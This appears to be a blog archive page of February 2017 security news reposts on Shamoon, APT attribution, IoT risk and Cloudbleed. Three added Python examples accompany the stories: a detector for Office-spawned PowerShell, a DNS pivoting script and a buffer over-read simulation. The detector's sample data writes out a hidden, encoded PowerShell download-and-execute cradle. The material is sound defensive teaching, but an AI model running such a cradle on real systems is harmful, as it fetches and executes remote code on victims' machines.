Archive for February 2017

'Digital Cohesion' Shows Promise, Security Concerns

The era of “digital cohesion,” a paradigm in which advanced artificial intelligence technologies and networks are used to support mega-services that adapt to human behavior and anticipate users' needs, is seen as an inevitable, positive societal change, according to Juniper Networks.

Juniper, in a new report, describes digital cohesion as taking the diverse apps, platforms, services and data we use every day and enabling them to work together seamlessly, securely and smartly. This paves the way for predictive, automated, network-based mega-services that adapt to user behavior, enabling better decision-making and enriching personal and business lives.

As a simple example, imagine a single service that makes suggestions for what to have for dinner. Seems basic enough, but this mega-service will take information from your health and fitness device to understand your calorie requirements and dietary restrictions. It will combine this with your cooking app to understand what food you like and then link to your calendar to know when it’s best to eat. It could also tap into your smart fridge to see what ingredients are on hand and/or use your location to determine what local stores or restaurants are available and order if appropriate.

The company’s research shows that 60% of global consumer respondents expect smart connectivity to be commonplace within five years. Another 60% of them anticipate digital cohesion will deliver ‘technology success’ through automation/control, and 51% anticipate it will deliver ‘strategic success’ through improved customer experiences.

This era is already underway: a full 91% of global senior IT decision-maker (ITDM) respondents have seen an increase in the number of ‘smart’ infrastructure devices connecting to their corporate networks in the past three years.

Business respondents in the survey said that they expect digital cohesion to deliver advantages including increased productivity, improved budget efficiency, new workforce management models and business service innovation. Interestingly, the research shows that many prioritize integration and interoperability over specific features or looks.

However, despite all of the positive indicators, the first iteration of this smart-thing network (i.e., the internet of things) has shown that data security and privacy are two potential obstacles to market development. Ultimately, trust in the privacy and security of data is the deciding factor for mega-service providers.

For instance, 53% of consumers specified that security is the most important factor when selecting a new smart device, while 66% of business respondents said security/compliance is the biggest risk factor in digital cohesion. Additionally, only 25% of business respondents said they are completely ready to trust the security of the underlying networks and devices. Juniper's research shows that trust is non-negotiable for users and that a thoughtful, proactive approach to security is paramount.

Both consumers and business users see their mobile devices as the portals that drive these mega-services. As a result, telecom service providers will need to re-examine the way they build and deploy their networks in order to support this era.

Source: Information Security Magazine

Crossed Swords 2017 Takes Cyber War Games to Next Level

Crossed Swords 2017, the cyberwar games sponsored by the NATO Cooperative Cyber Defence Centre of Excellence, has added an element of cyber-kinetic engagement for the first time.

Taking place earlier this month, the exercise focused on developing tactical execution skills in a responsive cyber-defense scenario.

“The scenario was based on a military cyber-operation,” explained Aare Reintam, exercise director at the NATO CCD COE. “Penetration testers, digital battlefield professionals and members of Special Forces were tasked with regaining control over a specific military system. This one-of-a-kind cyber-kinetic engagement meant that Special Forces were used to retrieve physical evidence, including electronic equipment and data storage devices, as they would in a realistic mission in cooperation with battlefield digital forensics professionals.”

Crossed Swords is the sister exercise of Locked Shields, the world’s largest and most advanced international technical cyber-defense exercise. It focuses on training penetration testers, digital forensics professionals, situational awareness experts and monitoring specialists that fill the role of the attacking team at Locked Shields. Crossed Swords 2017 trained evidence gathering and information analysis for technical attribution as well as identifying and stopping malicious activities.

“Technical cyber-defense exercises typically train information system defense,” said Reintam. “However, this can only be done with a real-time deployment of opposing force played by security specialists and penetration testers. These professionals, usually known as the Red Team, are the focus of Crossed Swords.”

Source: Information Security Magazine

#MWC2017: IoT Adoption Continues to Present Security Challenges

The internet of things (IoT) will soon be widespread, as 85% of businesses plan to implement it by 2019—opening up a big tear in the cybersecurity fabric at enterprises.

The Internet of Things: Today and Tomorrow report, published by Hewlett Packard Enterprise’s Aruba division, confirms the clear business benefits from investments in IoT. However, Aruba’s report cautions that connecting thousands of things to existing business networks has already resulted in security breaches for the majority of organizations.

The research questioned 3,100 IT and business decision makers across 20 countries to evaluate the current state of IoT and its impact across different industries. The study shows that while virtually all business leaders (98%) have an understanding of IoT, many are unclear of the exact definition of IoT and what it means for their business.

“The ‘internet of things’ means sensors connected to the internet and behaving in an internet-like way by making open, ad hoc connections, sharing data freely and allowing unexpected applications, so computers can understand the world around them and become humanity’s nervous system technology,” said tech visionary Kevin Ashton—who coined the term “internet of things,” in an Aruba eBook.

When examining the business benefits of IoT, Ashton discovered that the real-world benefits gained from IoT exceeded even the original expectations. This “expectations dividend” is evident in two key performance areas: business efficiency and profitability.

As an example, only 16% of business leaders projected a large profit gain from their IoT investment, yet post-adoption, 32% of executives realized profit increases. Similarly, only 29% of executives expected their IoT strategies to result in business efficiency improvements, whereas actual results show that 46% experienced efficiency gains.

“With the business benefits of IoT surpassing expectations, it’s no surprise that the business world will move towards mass adoption by 2019,” said Chris Kozup, vice president of marketing at Aruba. “But with many executives unsure of how to apply IoT to their business, those who succeed in implementing IoT are well positioned to gain a competitive advantage.”

Alongside these positive returns, however, Aruba's research also uncovered security flaws across many IoT deployments: 84% of organizations have experienced an IoT-related security breach, and more than half of respondents said external attacks are a key barrier to embracing and adopting an IoT strategy.

That said, a holistic IoT security strategy, built on strong network access control and policy management, will not only protect enterprises but also simplify the security approach for IT.

“While IoT grows in deployment, scale and complexity, proper security methodologies to protect the network and devices, and more importantly, the data and insights they extract, must also keep pace,” Kozup added. “If businesses do not take immediate steps to gain visibility and profile the IoT activities within their offices, they run the risk of exposure to potentially malicious activities.”

Source: Information Security Magazine

IISP Apply to Privy Council for Information Security Royal Charter

The Institute of Information Security Professionals (IISP) has officially applied to the Privy Council for a Royal Charter.

Amanda Finch, general manager of the independent not-for-profit body, told Infosecurity that the Royal Charter is “something that I, and the board, feel is needed for the profession.”

“As the stakes are getting increasingly higher, organizations will want to hire people that have a chartered status,” said Finch. “In the same way that when you go to a doctor, you don’t want to see someone who will give you snake oil – you want to see a qualified doctor.”

Finch declared that Chancellor of the Exchequer, Philip Hammond, outlined his expectation that by 2020, the information security industry should offer a Royal Charter for qualified industry professionals. “There is a lot of support for this,” she added.

An application for a Royal Charter takes the form of a Petition to The Sovereign in Council. Charters are granted rarely and a body applying for a Charter would normally be expected to meet a number of criteria. 

“There can only be one Royal Charter [for an industry],” argued Finch, “and to get that, you need to be uniquely positioned to represent the profession and financially sound. It’s a rigorous process,” she said, stressing that the IISP is well positioned to succeed in its application. “We’d like to migrate a lot of our members into chartered members.”

The IISP is hoping to hear back about the status of their application within the next few months.

Source: Information Security Magazine

Research: Shamoon Attackers Targeted Specific Victims

New research from Symantec has revealed that recent attacks involving the destructive malware Shamoon (W32.Disttrack.B) were aimed at specific Middle East targets, although those suspected of being behind them appear to be linked to a much wider campaign. 

In a blog post on its website, the firm explained that whilst the attackers were able to compromise multiple victims in the region, only selected organizations in or linked to Saudi Arabia were targeted with the destructive wiping attacks.

Symantec attributed the campaign to a group it tracks as Timberworm, which facilitated the third wave of Shamoon attacks in January 2017. The group is also suspected of being part of a much larger operation infiltrating a far broader range of organizations than those hit by the Shamoon wiper.

“During the January attacks, Symantec discovered a high correlation between Timberworm and the presence of Shamoon in a number of organizations in Saudi Arabia,” wrote a Symantec security researcher. “Timberworm appears to have gained access to these organizations’ networks weeks and, in some cases, months before the Shamoon attacks occurred.”

Once on the network, the attackers' primary goal was detailed network reconnaissance, credential harvesting and persistent remote access, Symantec added, with Shamoon preconfigured with a wipe date and the necessary credentials to maximize the overall impact during a coordinated attack.

Symantec said that Timberworm’s planned campaign saw them target individuals at certain companies with spear phishing emails, some of which contained Microsoft Word or Excel files as attachments, whilst others contained malicious links to similar files.

Opening the documents invoked PowerShell from a malicious macro, granting the attackers remote access to the affected computer. Once Timberworm established that the target was of interest, it deployed custom malware, hacking tools and software traditionally used in system and network administration.

From there, the cyber-criminals configured the Shamoon payloads per organization and then coordinated the attacks on a pre-determined date. 

“The Shamoon attacks illustrate how a growing number of targeted attack groups are relying on common off-the-shelf tools to compromise targets,” continued Symantec. “The Shamoon attackers managed to get access to targets’ networks using socially engineered spear phishing emails and abusing Office macros and PowerShell to gain initial footholds. In particular, the use of PowerShell has been a popular tactic of late.

“The appeal of ‘living off the land’ is obvious. Attackers believe malicious activity will be more difficult to detect if legitimate tools are involved and malware use is kept to a minimum. The use of legitimate tools may also serve to thwart attribution to specific actors.”
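The chain Symantec describes (a macro-bearing Office attachment, PowerShell launched from the macro, then off-the-shelf administration tools) is also the chain a defender can key on, precisely because "living off the land" leaves no malware hash to match. The following is an added example, not Symantec's code: a small detector over process-creation telemetry that flags an Office application spawning a script host, and decodes any -EncodedCommand payload so a cradle hidden inside base64 can still be inspected. The event records, host names, users, paths and URLs are constructed for the example, and the indicator list and parent/child process sets are the author's choices.

```python
"""Hunt for the initial-foothold pattern Symantec describes: an Office
application spawning PowerShell (or another script host) with a download
cradle, an encoded command or a hidden window.

Added example, not Symantec's tooling. The events below are constructed in
the style of Sysmon Event ID 1 (process creation); hosts, users, paths and
URLs are made up, and the indicator list is the author's choice.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Command-line indicators; each one that matches adds a reason to the alert.
INDICATORS = [
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest",
                re.I), "download cradle"),
    (re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "no profile"),
]
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """PowerShell's -EncodedCommand carries base64 of UTF-16LE text. Return the
    decoded script, or None if the argument is absent or not valid base64."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Return an alert for an Office-to-script-host spawn, else None."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Inspect the decoded payload as well, so -enc cannot hide the cradle.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    reasons = [f"{parent} spawned {child}"]
    reasons += [label for pattern, label in INDICATORS if pattern.search(text)]
    return {"host": event["Computer"], "user": event["User"],
            "reasons": reasons, "decoded": decoded}


def scan(events):
    return [alert for alert in map(evaluate, events) if alert is not None]


# Constructed sample telemetry (not real data).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
SAMPLE_EVENTS = [
    {"Computer": "WS-0142", "User": "CORP\\alice",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + base64.b64encode(CRADLE.encode("utf-16-le")).decode()},
    {"Computer": "WS-0077", "User": "CORP\\bob",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"iex (new-object net.webclient)"
                    ".downloadstring('http://203.0.113.9/x')\""},
    {"Computer": "WS-0077", "User": "CORP\\bob",      # benign: shell opened from Explorer
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"Computer": "WS-0142", "User": "CORP\\alice",    # benign: print helper from Word
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "C:\\Windows\\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["host"], alert["user"], "; ".join(alert["reasons"]))
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

Run as a script it prints the two alerts and the decoded cradle. The parent/child relationship carries the signal here, not the binary: powershell.exe is legitimate on every host, but Word launching it with a hidden window and a download cradle is not, which is why the benign Explorer-spawned shell and the Word print helper pass. A production rule would also follow cmd.exe or wscript.exe as an intermediate parent, and would exclude known automation accounts rather than process names.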

Source: Information Security Magazine

Japan-Centric APT Campaign Targets Government

The hackers believed to be behind the election-season hacking in the United States may have now set their sights on Japan.

While investigating some of the lesser-known servers that the hacking group known as APT28 or Sofacy routinely uses to host its infrastructure, security firm Cylance discovered another prolonged campaign that appeared to exclusively target Japanese companies and individuals. The firm tracks this threat group internally as “Snake Wine.”

“The Snake Wine group has proven to be highly adaptable and continued to adopt new tactics in order to establish footholds inside of victim environments,” Cylance researchers said in a blog post. “The exclusive interest in Japanese government, education, and commerce will continue into the future as the group is just starting to build and utilize their existing current attack infrastructure. If the past is an accurate indicator, attacks will continue to escalate in both skill and intensity as the attackers implement new tactics in response to defenders acting on previously released information.”

The campaign began around August of 2016—and to date, all observed attacks have been the result of spear phishing attempts against the victim organizations, in which malicious attachments unpack a back door that functions primarily as a modular platform. The attacker then has the ability to directly download additional modules and execute them in memory from the command and control (C2) server.

Common activities are identifying processor, memory, drive and volume information, executing commands directly from the attacker, enumerating and removing files and folders, and uploading and downloading files. A number of the samples are signed using the leaked code-signing certificate from the Hacking Team breach.

As for attribution, Snake Wine has aspects that link it to the Russian group—but also leaves footprints that trace back to Chinese actors.

“[The] registration style was eerily close to previously registered APT28 domains; however, the malware used in the attacks did not seem to line up at all,” Cylance researchers said. “Cylance believes some of the steps taken by the attacker could possibly be an attempt at a larger disinformation campaign based upon some of the older infrastructure that would link it to a well-known CN-APT group.”

Perhaps the most interesting aspect of the Snake Wine group is the number of techniques used to obscure attribution. 

“Signing the malware with a stolen and subsequently publicly leaked code-signing certificate is sloppy even for well-known CN-APT groups,” the researchers said. “Also of particular interest from an attribution obfuscation perspective is direct IP crossover with previous Dynamic DNS domains associated with known CN-APT activity. A direct trail was established over a period of years that would lead competent researchers to finger CN operators as responsible for this new activity as well.  Also of particular interest was the use of a domain hosting company that accepts BTC and was previously heavily leveraged by the well-known Russian group APT28.”
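Cylance's attribution rests on infrastructure overlap: domain registration style, IP addresses shared with old dynamic-DNS names, and a hosting provider previously used by APT28. The following is an added example, not Cylance's tooling, of the pivot itself: a breadth-first walk over passive-DNS records from a newly seen domain to any hostname already tied to a known group, skipping IPs that host too many names to mean anything. All records, hostnames and IPs are constructed (reserved example names and documentation address ranges), and the hop limit and tenant threshold are the author's choices.

```python
"""Infrastructure pivoting of the kind Cylance describes: walk passive-DNS
relationships (hostname -> IP -> hostname) outward from a new domain and stop
when the path reaches infrastructure already tied to a known group.

Added example, not Cylance's tooling. The records are constructed; hostnames
are reserved example names and the IPs come from documentation ranges, so
none of this maps to a real campaign.
"""
from collections import defaultdict, deque

# Constructed passive-DNS observations: (hostname, ip).
PDNS = [
    ("new-campaign-a.example", "203.0.113.10"),
    ("ddns-old-1.example", "203.0.113.10"),      # dynamic-DNS name seen years earlier
    ("ddns-old-1.example", "192.0.2.44"),
    ("known-cnapt.example", "192.0.2.44"),
    ("new-campaign-b.example", "198.51.100.5"),
    ("known-cnapt.example", "198.51.100.5"),
] + [(f"tenant-{i}.example", "198.51.100.5") for i in range(6)]  # a shared hosting box

KNOWN_CN_APT = {"known-cnapt.example"}


def build_graph(records):
    """Undirected bipartite graph of hostnames and IPs, insertion-ordered."""
    adj = defaultdict(list)
    for host, ip in records:
        if ip not in adj[host]:
            adj[host].append(ip)
        if host not in adj[ip]:
            adj[ip].append(host)
    return adj


def crowded_ips(records, adj, max_tenants):
    """IPs carrying more names than max_tenants: shared hosting, CDN or sinkhole
    addresses, where co-location says nothing about who controls a domain."""
    return {ip for _, ip in records if len(adj[ip]) > max_tenants}


def pivot(start, known, records, max_hops=4, max_tenants=5):
    """Shortest hostname/IP path from start to any node in known, or None."""
    adj = build_graph(records)
    skip = crowded_ips(records, adj, max_tenants)
    queue = deque([(start, [start])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node in known:
            return path
        if len(path) - 1 >= max_hops:        # hop budget spent on this branch
            continue
        for nxt in adj[node]:
            if nxt in seen or nxt in skip:
                continue
            seen.add(nxt)
            queue.append((nxt, path + [nxt]))
    return None


if __name__ == "__main__":
    for domain in ("new-campaign-a.example", "new-campaign-b.example"):
        path = pivot(domain, KNOWN_CN_APT, PDNS)
        print(domain, "->", " -> ".join(path) if path else "no usable link")
```

Reaching a known node proves a link between pieces of infrastructure, not between operators, which is exactly the problem Cylance raises: a deliberate false flag that reuses old CN-APT hosting produces this path just as readily as a real reuse would. The crowded-IP filter removes the commonest false positive; in the constructed data, new-campaign-b shares an address with the known domain but so do six unrelated tenants, and raising max_tenants turns that meaningless co-location into a "link".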

Source: Information Security Magazine

Password re-use is rampant among Millennials 18-30

Nearly 60% of mobile device users have had to reset a password in the past two months.

Further, a survey by Keeper Mobile has found that more than half of respondents are still trying to remember their passwords in their heads. They are also two times more likely to have trouble logging into an account if they wrote their passwords down or tried to memorize them.

This is directly related to the alarming statistic that found that 87% of mobile device users between the ages of 18-30 reuse passwords across multiple websites and applications.

This bad habit could result in millions of accounts being compromised since hackers typically test a stolen password against multiple accounts, including banking, retail, social media, email and healthcare websites. One stolen password could give a hacker the keys to a person’s digital life.  

Users are not without awareness of the issue: The survey also showed that nearly half (46%) of respondents think their phone is the least secure device that they own. Even so, 41% use their phone for sensitive, password-protected applications (banking/healthcare).

“People have a tremendous amount of personal and confidential information on their smartphones,” said Darren Guccione, CEO and co-founder of Keeper Security. “It was disturbing to find that almost half of respondents in our survey think their phone is the least secure device that they own, yet 55% of them haven’t downloaded a security application. It is clear that further education regarding the importance of mobile cybersecurity is necessary in order to protect their digital lives.”

Interestingly, age and salary correlate with the level of security on a phone. About half (46%) of people aged 45+ do not protect their phones with a secure lock screen, compared to 26% of those aged 44 and under. And 34% of respondents making under $75,000 annually do not password-protect their phone, compared to 25% of those making $75,000 or more.

Also, the vast majority are not worried about social media security, yet 75% of users connect to their social media profiles on other websites and applications (e.g. login with Facebook).

“An important first step to mobile cybersecurity is for consumers to learn how to create secure passwords and not reuse passwords over multiple logins,” noted Guccione. “Also, website administrators need to implement password complexity policies to secure users.”

Source: Information Security Magazine

#MWC2017: Large Portion of Orgs Lack Enterprise Mobility Maturity

About 38% of enterprises still only use mobility solutions for basic tools like email and calendar, and do not have a firm requirement to secure their staff’s devices.

According to a study from Sapio Research, this is having significant negative consequences: These enterprises are 15% less productive and 29% less profitable than those with more advanced mobile capabilities, such as file-sharing apps, collection and analysis of data, app integrations and multifactor authentication.

The study examines the different rates of adoption of enterprise mobility across more than 500 businesses in the UK and the US and classifies them into a four-stage maturity model: Entry-level, opportunistic, additive and transformational. Progress through each stage was determined by the degree of use of productivity tools and data, and the security measures required.

Despite enterprise mobility being an accepted norm, 38% of enterprises have failed to progress beyond the entry-level stage, and 81% remain in the bottom half of the model. About a fifth (19%) are in the third stage, additive, typified by app integrations and the collection of devices’ contextual usage data.

There are clear incentives for moving up the stack, as it were: CIOs and IT teams who have delivered the most advanced enterprise mobility are perceived 14% and 12% more favorably within their organizations than those who have only introduced the most basic of functionality.

And, the study showed that the simple step from entry-level to opportunistic (first stage to second stage) delivers the greatest and quickest performance improvements. Just by introducing file-sharing tools, monitoring usage data and requiring at least native OS security measures to be in place on the device, enterprises see a 9% profitability improvement and 7% productivity boost.

“The findings of this study underline the case for companies to dedicate investment to their enterprise mobility strategy,” said Dave Schuette, executive vice president of the Enterprise Business Unit at Synchronoss, which sponsored the survey. “Until now, the benefits of mobility maturity have been anecdotal or theoretical. We now know that those who invest in advanced mobility tools—balancing efficiency with security—benefit from double-figure improvements in productivity, in turn contributing to massive profitability gains.”

Security, he added, is one of the most important aspects of mobile maturity.

“Productivity doesn’t come from the availability of mobility tools alone,” Schuette noted. “Collecting contextual data from employees’ devices lets a company make informed, deliberate changes that improve its operations and processes. That same data can also be used for more robust user ID verification, boosting security. The higher the security on a device, the more capabilities an organization can confidently add to it—which in turn improves productivity. It’s the ultimate virtuous circle for enterprise technology.”

Source: Information Security Magazine

Calls for Digitization After NHS Data Loss Blunder

Security experts are urging the NHS to accelerate its digital transformation after more than half a million letters sent between GPs and hospitals went undelivered over a five-year period, putting patient lives at risk.  

Thousands of patients are feared to have been harmed by the massive mix-up, which led to the company hired to deliver the documents instead storing them in a warehouse, according to the Guardian.

NHS Shared Business Services, which was part owned by the Department of Health, has now finally delivered the letters to 7700 GP surgeries up and down the country.

However, more than 500,000 documents including test results and cancer screenings were mislaid between 2011 and 2016.

NHS England has now been forced to pay GPs over £2 million to examine the correspondence. The report claimed 2500 cases so far require further investigation to discover potential for harm.

A separate investigation has apparently been launched to see whether any patient deaths may have been caused by the incident, which was finally discovered in March last year.

Opposition party leaders are claiming health secretary Jeremy Hunt deliberately misled parliament by failing to provide details of the incident last year.

Hunt’s plans for a paperless NHS by 2018 were quietly dropped this month after an outside expert apparently judged the country’s hospital IT systems unable to support the move.

However, Smoothwall healthcare specialist, Zak Suleman, argued the latest revelations are proof of the need to urgently digitize all parts of the NHS.

“A fully paperless NHS that allows the easy exchange of data would be more efficient and fool proof than the current set-up. However, to simply ‘digitalize’ one of the biggest institutions in the UK is a complex overhaul and the government must ensure, above all else, that all data is kept safe and secure,” he claimed.

“The NHS must embrace technology now or risk further debacles using outdated solutions.”

Egress co-founder, Tony Pepper, added that physical data is inherently less secure than digital, being difficult to trace and open to interference.

"While digital records have their own set of challenges, with the right foresight and security and compliance mechanisms in place, it's far less likely to go missing or be subject on this scale to the same issues of human error,” he argued.

“We're yet to discover the full extent of this data loss, but it's not an over-reaction to suggest the difference between going digital or not is a matter of life or death."

Source: Information Security Magazine

Cloudflare Bug Spills Private Data Online

Security experts are urging users to change all of their online passwords after a bug at content delivery network Cloudflare exposed customer data from countless clients, including Uber, Fitbit and OkCupid.

The source of the problem – discovered accidentally by Google Project Zero researcher Tavis Ormandy – was a memory disclosure (a buffer over-read) in the HTML parser chain shared by several Cloudflare features, which caused bytes of unrelated process memory to be written into HTTP responses.

However, it was compounded by the fact that leaked data was then cached by search engines.

The leaked data included “private information such as HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data,” Cloudflare CTO, John Graham-Cumming explained in a lengthy blog post.

“We quickly identified the problem and turned off three minor Cloudflare features (email obfuscation, Server-side Excludes and Automatic HTTPS Rewrites) that were all using the same HTML parser chain that was causing the leakage. At that point it was no longer possible for memory to be returned in an HTTP response,” he added.
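Graham-Cumming's description (a shared HTML parser chain returning memory in responses) is the symptom; the class of bug behind it is a scanner that runs past the end of its input. The following is an added simulation, not Cloudflare's parser and not its actual code: a toy tag scanner over a bytes object that stands in for process memory, with an index standing in for the parser's pointer. It shows how a loop guard written as "not equal to end" instead of "less than end" lets a page that ends mid-tag pull a neighbouring request's bytes into the output. The HTML fragment and the neighbouring cookie data are constructed.

```python
"""Simulation of the failure class behind Cloudbleed: a scanner whose loop
guard tests for equality with the end of its input can be stepped past that
end and then keeps copying whatever happens to sit after the buffer.

Added example. The scanner is a toy, not Cloudflare's parser; the bytes
object stands in for process memory and the index for a pointer. The HTML
fragment and the neighbouring 'other request' data are constructed.
"""

# The response being filtered: a tag that never closes and ends in a backslash.
HTML = b'<a href="x" class=\\'
# What happens to lie next to it in memory: another customer's request (made up).
NEIGHBOUR = b'Cookie: session=1f9c-not-a-real-token; >'
MEMORY = HTML + NEIGHBOUR


def scan_tag(memory, html_len, fixed, out_cap=128):
    """Copy the body of the first <...> tag found in memory[:html_len].
    A backslash inside the tag escapes the byte that follows it.
    fixed=False uses the broken guard (p != end); fixed=True uses p < end."""
    p, end = 0, html_len
    while p < end and memory[p] != ord('<'):
        p += 1
    if p >= end:
        return b''
    p += 1
    out = bytearray()
    while (p < end) if fixed else (p != end):
        c = memory[p]
        if c == ord('>'):
            break
        if c == ord('\\'):
            # The escape consumes two bytes. When the backslash is the last byte
            # of the input, p lands exactly on end; the broken guard never sees
            # p == end again and the loop walks on into the neighbour's data.
            p += 1
            if fixed and p >= end:
                break
            c = memory[p]
        if len(out) < out_cap:
            out.append(c)
        p += 1
    return bytes(out)


def leaked_neighbour(fixed):
    """True if the scan copied bytes belonging to the neighbouring request."""
    return b"session=" in scan_tag(MEMORY, len(HTML), fixed)


if __name__ == "__main__":
    print("broken guard:", scan_tag(MEMORY, len(HTML), fixed=False))
    print("fixed guard :", scan_tag(MEMORY, len(HTML), fixed=True))
```

In C the broken variant keeps reading until it meets a '>' or unmapped memory; in this simulation it would raise IndexError once it ran off MEMORY, so the constructed neighbour data ends in a '>'. The repair is the same in either setting: bound the pointer with an inequality rather than an equality test, and re-check it after any step that advances by more than one byte.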

Although Graham-Cumming claimed the bug was fixed globally in under seven hours, it may have been leaking highly sensitive data for months.

“The greatest period of impact was between February 13 and February 18 with around one in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests),” he added.

In fact, given the extent of the info cached by search engines, Cloudflare clients will now be under pressure to inform their own customers of the extent of the privacy snafu.

“The examples we're finding are so bad, I cancelled some weekend plans to go into the office on Sunday to help build some tools to cleanup. I've informed Cloudflare what I'm working on,” said Ormandy.

“I'm finding private messages from major dating sites, full messages from a well-known chat service, online password manager data, frames from adult video sites, hotel bookings. We're talking full https requests, client IP addresses, full responses, cookies, passwords, keys, data, everything.”

Although he praised Cloudflare for its response to the issue, it’s also true the firm’s bug bounty offers little in the way of rewards for white hat researchers – free t-shirts, rather than money.

Former Google click fraud boss and current Shape Security CTO, Shuman Ghosemajumder, argued that it is “one of the widest exposures of confidential and sensitive consumer data ever observed.”

“This incident has many people suggesting that everyone in the world should change all of their passwords immediately,” he said.

“The total exposure is likely not that large – i.e., not all of your passwords have been compromised – but the problem is that almost any one of your passwords on over four million websites could have been compromised, so the safest course of action is to act as though all of your passwords were compromised.”

Kaushik Narayan, CTO at Skyhigh Networks, analyzed data from over 30 million enterprise users worldwide and found that 99.7% of companies have at least one employee who used a Cloudbleed-vulnerable cloud application.

“This means hackers could have stolen user passwords for these cloud applications – and may even have access to session keys exposed, while a session is live. But this user-data also revealed another surprise – out of 128 enterprise-ready applications that could have been compromised, only four were vulnerable,” he added.

“Cloudbleed is the latest in a string of vulnerabilities that should be of concern to enterprise IT security and a reminder of the problems caused by user password reuse across corporate services, personal websites and cloud services.”

Source: Information Security Magazine